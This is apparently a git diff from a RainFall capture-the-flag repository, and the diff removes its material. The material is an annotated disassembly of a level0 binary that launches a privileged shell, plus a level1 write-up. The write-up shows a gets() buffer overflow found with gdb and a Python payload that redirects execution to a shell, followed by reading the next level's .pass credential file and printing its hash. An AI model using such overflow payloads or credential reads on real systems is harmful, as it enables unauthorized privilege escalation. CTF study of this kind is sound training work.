			No commits in common. "527e40164b3f63cb1716012d21c39b995a087a59" and "2e78142389b9e5f4ca7f8f4c1cbd99b5b32d9f9b" have entirely different histories.
		
	
	
		
			527e40164b
			...
			2e78142389
		
	
		|  | @ -1,58 +0,0 @@ | |||
| 0x08048ec0 <+0>:	push   ebp | ||||
| 0x08048ec1 <+1>:	mov    ebp,esp | ||||
| 0x08048ec3 <+3>:	and    esp,0xfffffff0 | ||||
| 0x08048ec6 <+6>:	sub    esp,0x20 | ||||
| // Save ebp on the stack, esp on ebp, align stack and reserve 32 bytes for the stack | ||||
| 0x08048ec9 <+9>:	mov    eax,DWORD PTR [ebp+0xc] | ||||
| // eax = argv (or &argv[0]) | ||||
| 0x08048ecc <+12>:	add    eax,0x4 | ||||
| // eax = &argv[1] | ||||
| 0x08048ecf <+15>:	mov    eax,DWORD PTR [eax] | ||||
| // eax = argv[1] | ||||
| 0x08048ed1 <+17>:	mov    DWORD PTR [esp],eax | ||||
| // stack[esp] = eax; | ||||
| 0x08048ed4 <+20>:	call   0x8049710 <atoi> | ||||
| // call atoi with argv[1] as argument | ||||
| 0x08048ed9 <+25>:	cmp    eax,0x1a7 | ||||
| // compare atoi result with 423 | ||||
| 0x08048ede <+30>:	jne    0x8048f58 <main+152> | ||||
| // if not equal jump to main+152 which writes "No !" and exits... | ||||
| 0x08048ee0 <+32>:	mov    DWORD PTR [esp],0x80c5348 | ||||
| // or continue here, which will launch a shell, done ! | ||||
| 0x08048ee7 <+39>:	call   0x8050bf0 <strdup> | ||||
| 0x08048eec <+44>:	mov    DWORD PTR [esp+0x10],eax | ||||
| 0x08048ef0 <+48>:	mov    DWORD PTR [esp+0x14],0x0 | ||||
| 0x08048ef8 <+56>:	call   0x8054680 <getegid> | ||||
| 0x08048efd <+61>:	mov    DWORD PTR [esp+0x1c],eax | ||||
| 0x08048f01 <+65>:	call   0x8054670 <geteuid> | ||||
| 0x08048f06 <+70>:	mov    DWORD PTR [esp+0x18],eax | ||||
| 0x08048f0a <+74>:	mov    eax,DWORD PTR [esp+0x1c] | ||||
| 0x08048f0e <+78>:	mov    DWORD PTR [esp+0x8],eax | ||||
| 0x08048f12 <+82>:	mov    eax,DWORD PTR [esp+0x1c] | ||||
| 0x08048f16 <+86>:	mov    DWORD PTR [esp+0x4],eax | ||||
| 0x08048f1a <+90>:	mov    eax,DWORD PTR [esp+0x1c] | ||||
| 0x08048f1e <+94>:	mov    DWORD PTR [esp],eax | ||||
| 0x08048f21 <+97>:	call   0x8054700 <setresgid> | ||||
| 0x08048f26 <+102>:	mov    eax,DWORD PTR [esp+0x18] | ||||
| 0x08048f2a <+106>:	mov    DWORD PTR [esp+0x8],eax | ||||
| 0x08048f2e <+110>:	mov    eax,DWORD PTR [esp+0x18] | ||||
| 0x08048f32 <+114>:	mov    DWORD PTR [esp+0x4],eax | ||||
| 0x08048f36 <+118>:	mov    eax,DWORD PTR [esp+0x18] | ||||
| 0x08048f3a <+122>:	mov    DWORD PTR [esp],eax | ||||
| 0x08048f3d <+125>:	call   0x8054690 <setresuid> | ||||
| 0x08048f42 <+130>:	lea    eax,[esp+0x10] | ||||
| 0x08048f46 <+134>:	mov    DWORD PTR [esp+0x4],eax | ||||
| 0x08048f4a <+138>:	mov    DWORD PTR [esp],0x80c5348 | ||||
| 0x08048f51 <+145>:	call   0x8054640 <execv> | ||||
| 0x08048f56 <+150>:	jmp    0x8048f80 <main+192> | ||||
| 0x08048f58 <+152>:	mov    eax,ds:0x80ee170 | ||||
| 0x08048f5d <+157>:	mov    edx,eax | ||||
| 0x08048f5f <+159>:	mov    eax,0x80c5350 | ||||
| 0x08048f64 <+164>:	mov    DWORD PTR [esp+0xc],edx | ||||
| 0x08048f68 <+168>:	mov    DWORD PTR [esp+0x8],0x5 | ||||
| 0x08048f70 <+176>:	mov    DWORD PTR [esp+0x4],0x1 | ||||
| 0x08048f78 <+184>:	mov    DWORD PTR [esp],eax | ||||
| 0x08048f7b <+187>:	call   0x804a230 <fwrite> | ||||
| 0x08048f80 <+192>:	mov    eax,0x0 | ||||
| 0x08048f85 <+197>:	leave   | ||||
| 0x08048f86 <+198>:	ret | ||||
|  | @ -0,0 +1 @@ | |||
| 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞D<EFBFBD> | ||||
|  | @ -1,93 +0,0 @@ | |||
| Code has 2 functions which are interesting, main and run. | ||||
| We need to execute run, for this we are going to use a buffer overflow attack. | ||||
| For this we've got to input more than the 64 bits allocated for gets command. | ||||
| We are going to override the stack so the ret command jump to run function. | ||||
| 
 | ||||
| ``` | ||||
| 0x08048480 <main+0>:	push   ebp | ||||
| 0x08048481 <main+1>:	mov    ebp,esp | ||||
| 0x08048483 <main+3>:	and    esp,0xfffffff0 | ||||
| 0x08048486 <main+6>:	sub    esp,0x50 | ||||
| 0x08048489 <main+9>:	lea    eax,[esp+0x10] | ||||
| 0x0804848d <main+13>:	mov    DWORD PTR [esp],eax | ||||
| 0x08048490 <main+16>:	call   0x8048340 <gets@plt> | ||||
| 0x08048495 <main+21>:	leave   | ||||
| 0x08048496 <main+22>:	ret | ||||
| ``` | ||||
| 
 | ||||
| ``` | ||||
| 0x08048444 <run+0>:		push   ebp | ||||
| 0x08048445 <run+1>:		mov    ebp,esp | ||||
| 0x08048447 <run+3>:		sub    esp,0x18 | ||||
| 0x0804844a <run+6>:		mov    eax,ds:0x80497c0 | ||||
| 0x0804844f <run+11>:	mov    edx,eax | ||||
| 0x08048451 <run+13>:	mov    eax,0x8048570 | ||||
| 0x08048456 <run+18>:	mov    DWORD PTR [esp+0xc],edx | ||||
| 0x0804845a <run+22>:	mov    DWORD PTR [esp+0x8],0x13 | ||||
| 0x08048462 <run+30>:	mov    DWORD PTR [esp+0x4],0x1 | ||||
| 0x0804846a <run+38>:	mov    DWORD PTR [esp],eax | ||||
| 0x0804846d <run+41>:	call   0x8048350 <fwrite@plt> | ||||
| 0x08048472 <run+46>:	mov    DWORD PTR [esp],0x8048584 | ||||
| 0x08048479 <run+53>:	call   0x8048360 <system@plt> | ||||
| 0x0804847e <run+58>:	leave | ||||
| 0x0804847f <run+59>:	ret | ||||
| ``` | ||||
| 
 | ||||
| Fig 1. Disassembly of main and run functions | ||||
| 
 | ||||
| The first step is to find where the ret address is stored, for this, we will | ||||
| stop the program just before it begins running main and check esp register's | ||||
| value. | ||||
| 
 | ||||
| ``` | ||||
| Reading symbols from /home/user/level1/level1...(no debugging symbols found)...done. | ||||
| (gdb) b *main+0 | ||||
| Breakpoint 1 at 0x8048480 | ||||
| (gdb) run | ||||
| Starting program: /home/user/level1/level1  | ||||
| 
 | ||||
| Breakpoint 1, 0x08048480 in main () | ||||
| (gdb) p $esp | ||||
| $1 = (void *) 0xbffff73c | ||||
| (gdb)  | ||||
| ``` | ||||
| 
 | ||||
| Now we need to go to the gets and input 64 random characters and try to see them | ||||
| on the stack | ||||
| 
 | ||||
| ``` | ||||
| Breakpoint 1, 0x08048495 in main () | ||||
| (gdb) x/128xb $esp | ||||
| 0xbffff6e0:	0xf0	0xf6	0xff	0xbf	0x2f	0x00	0x00	0x00 | ||||
| 0xbffff6e8:	0x3c	0xf7	0xff	0xbf	0xf4	0x0f	0xfd	0xb7 | ||||
| 0xbffff6f0:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41 | ||||
| 0xbffff6f8:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41 | ||||
| 0xbffff700:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41 | ||||
| 0xbffff708:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41 | ||||
| 0xbffff710:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41 | ||||
| 0xbffff718:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41 | ||||
| 0xbffff720:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41 | ||||
| 0xbffff728:	0x41	0x41	0x41	0x41	0x41	0x41	0x41	0x41 | ||||
| 0xbffff730:	0x00	0x84	0x04	0x08	0x00	0x00	0x00	0x00 | ||||
| 0xbffff738:	0x00	0x00	0x00	0x00	0xd3	0x54	0xe4	0xb7 | ||||
| 0xbffff740:	0x01	0x00	0x00	0x00	0xd4	0xf7	0xff	0xbf | ||||
| 0xbffff748:	0xdc	0xf7	0xff	0xbf	0x58	0xc8	0xfd	0xb7 | ||||
| 0xbffff750:	0x00	0x00	0x00	0x00	0x1c	0xf7	0xff	0xbf | ||||
| 0xbffff758:	0xdc	0xf7	0xff	0xbf	0x00	0x00	0x00	0x00 | ||||
| ``` | ||||
| 
 | ||||
| We can see our 64 'A's in the stack, notice there is some space before 0xbffff73c. | ||||
| That means we still need to put more 'A's, 12 precisely, then the address we want | ||||
| to jump to. | ||||
| 
 | ||||
| ```(python -c "print('A'*64+'A'*12+'\x44\x84\x04\x08')"; cat) | ./level1``` | ||||
| 
 | ||||
| ```level1@RainFall:~$ (python -c "print('A'*64+'A'*12+'\x44\x84\x04\x08')"; cat) | ./level1 | ||||
| Good... Wait what? | ||||
| whoami | ||||
| level2 | ||||
| cat /home/user/level2/.pass | ||||
| 53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77 | ||||
| ``` | ||||
| 
 | ||||
| :) | ||||